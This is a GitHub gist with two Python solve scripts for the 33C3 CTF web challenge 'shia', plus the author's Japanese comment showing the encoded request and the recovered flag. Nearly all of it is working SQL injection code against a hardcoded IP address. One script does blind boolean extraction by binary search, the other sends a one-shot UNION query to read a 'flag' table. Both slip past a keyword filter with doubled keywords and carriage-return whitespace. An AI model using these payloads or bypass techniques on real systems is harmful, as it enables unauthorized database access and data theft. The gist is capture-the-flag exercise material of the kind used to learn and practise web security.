@st98
Last active January 2, 2017 00:39
33C3 CTF - [web 175] shia
import requests
import urllib.parse
def check(s):
    """Blind-SQLi oracle: return True when response body *s* (bytes) contains the marker quote.

    The marker is the quote the server presumably returns when the injected
    boolean subquery evaluates to 1 (i.e. the ``/quote/`` lookup resolves to
    that record) — confirm against the application if the oracle misbehaves.
    """
    marker = b"Don't let your dreams be dreams!"
    return marker in s
# Challenge endpoint (33C3 CTF "shia", web 175).  The SQL fragment is appended
# to this path; the server apparently interpolates it into its quote lookup.
url = "http://78.46.224.75/quote/"

# Boolean blind-SQLi probe.  ``{}`` is the 1-based character position and
# ``{:x}`` the hex byte it is compared against (``binary`` forces a byte-wise,
# case-sensitive comparison).  The inner UNION glues the ``flag`` table
# (presumably four columns, hence the u/x/y/z dummies) onto a dummy row so the
# flag column can be addressed as ``y``; ``0x253333433325`` is hex for
# ``'%33C3%'`` and picks the row holding the flag (``33C3_`` is the prefix of
# the recovered flag).  Keyword rewriting for the server's filter is done by
# the caller, not here.
query = (
    "(select substring(y from {} for 1) <= binary 0x{:x} from "
    "(select * from "
    "(select 1 u)a join (select 2 x)b join (select 3 y)c join (select 4 z)d "
    "union select * from flag)f "
    "where y like 0x253333433325 limit 1)"
)
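def build_payload(q):
    """Rewrite SQL text *q* for the target's keyword filter and URL-encode it.

    Spaces become carriage returns (MySQL treats CR as whitespace) and the
    keywords ``select``/``union``/``join`` are written as ``sselectelect``,
    ``uunionnion`` and ``jjoinoin``.  Presumably the server strips each keyword
    once, which leaves the original keyword behind — the classic single-pass
    filter bypass; confirm this if the oracle stops responding.  Each
    ``replace`` is one pass, so the doubled forms are not rewritten again.
    """
    q = q.replace(' ', '\r')
    q = q.replace('select', 'sselectelect')
    q = q.replace('union', 'uunionnion')
    q = q.replace('join', 'jjoinoin')
    return urllib.parse.quote(q)


def oracle(pos, value):
    """Ask the server whether byte *pos* (1-based) of the flag is <= *value*.

    Sends one GET for the formatted ``query`` and returns ``check()`` of the
    body.  Values below 0x10 are emitted as a single hex digit (``0xa``);
    MySQL appears to read odd-length ``0x`` literals with an implicit leading
    zero, which is why the original format string worked.
    """
    q = query.format(pos, value)
    # Bounded so a stalled response cannot hang the whole extraction loop.
    resp = requests.get(url + build_payload(q), timeout=10)
    return check(resp.content)


def find_char(pos):
    """Binary-search the byte value at *pos* using the boolean oracle.

    Returns the integer byte value.  A return of 0 means the substring was
    empty (position past the end of the flag): an empty string compares <=
    every byte, so the search converges to 0.  Bytes above 0x7e are never
    probed, so a non-ASCII byte in the flag would be misread as 0x7e.
    """
    high = 0x7e
    low = -1
    # Invariant: the answer is in (low, high]; high is always > low.
    while high - low > 1:
        mid = (high + low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return high


def extract_flag():
    """Recover the flag byte-by-byte, printing progress, and return it.

    Stops at the first position whose value is 0, i.e. once the probe runs
    past the end of the string; the previous code looped forever appending
    NUL bytes there.
    """
    res = ''
    pos = 1
    while True:
        value = find_char(pos)
        if value == 0:
            break  # past the end of the flag
        res += chr(value)
        print(pos, res)
        pos += 1
    return res


if __name__ == '__main__':
    extract_flag()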
import requests
import sys
import urllib.parse
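def build_payload(p):
    """Rewrite SQL text *p* for the target's keyword filter and URL-encode it.

    Spaces become carriage returns (MySQL treats CR as whitespace) and the
    keywords ``select``/``union``/``join`` are written as ``sselectelect``,
    ``uunionnion`` and ``jjoinoin``.  Presumably the server strips each keyword
    once, leaving the original keyword behind — a single-pass filter bypass;
    confirm this if the server starts rejecting requests.  Each ``replace`` is
    one pass, so the doubled forms are not rewritten again.
    """
    p = p.replace(' ', '\r')
    p = p.replace('select', 'sselectelect')
    p = p.replace('union', 'uunionnion')
    p = p.replace('join', 'jjoinoin')
    return urllib.parse.quote(p)


def main(argv):
    """Send ``argv[1]`` as an injected SQL fragment and print the URL and raw body.

    Exits with status 1 and a usage line on stderr when no fragment is given,
    so a missing argument is visible to shell pipelines instead of a silent
    success.
    """
    if len(argv) < 2:
        print('usage: t.py <sql fragment>', file=sys.stderr)
        sys.exit(1)
    u = 'http://78.46.224.75/quote/' + build_payload(argv[1])
    print(u)
    # Bounded so a stalled challenge host cannot hang the shell.
    print(requests.get(u, timeout=10).content)


if __name__ == '__main__':
    main(sys.argv)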
st98 commented Dec 31, 2016

solve.pyではわざわざBlind SQLiしてるけど

$ python2 t.py '0 union select * from (select 1)a join (select y from (select * from (select 1 u)a join (select 2 x)b join (select 3 y)c join (select 4 z)d union select * from flag)f where y like 0x253333433325 limit 1)b join (select 3)c'
http://78.46.224.75/quote/0%0Duunionnion%0Dsselectelect%0D%2A%0Dfrom%0D%28sselectelect%0D1%29a%0Djjoinoin%0D%28sselectelect%0Dy%0Dfrom%0D%28sselectelect%0D%2A%0Dfrom%0D%28sselectelect%0D1%0Du%29a%0Djjoinoin%0D%28sselectelect%0D2%0Dx%29b%0Djjoinoin%0D%28sselectelect%0D3%0Dy%29c%0Djjoinoin%0D%28sselectelect%0D4%0Dz%29d%0Duunionnion%0Dsselectelect%0D%2A%0Dfrom%0Dflag%29f%0Dwhere%0Dy%0Dlike%0D0x253333433325%0Dlimit%0D1%29b%0Djjoinoin%0D%28sselectelect%0D3%29c
{
  "reason": "<p><strong>33C3_runnn!ng_for_your_life_fRom_shia_!</strong></p><p><footer>by Shia - added 3</footer></p>", 
  "success": 1
}

の方が楽だった…
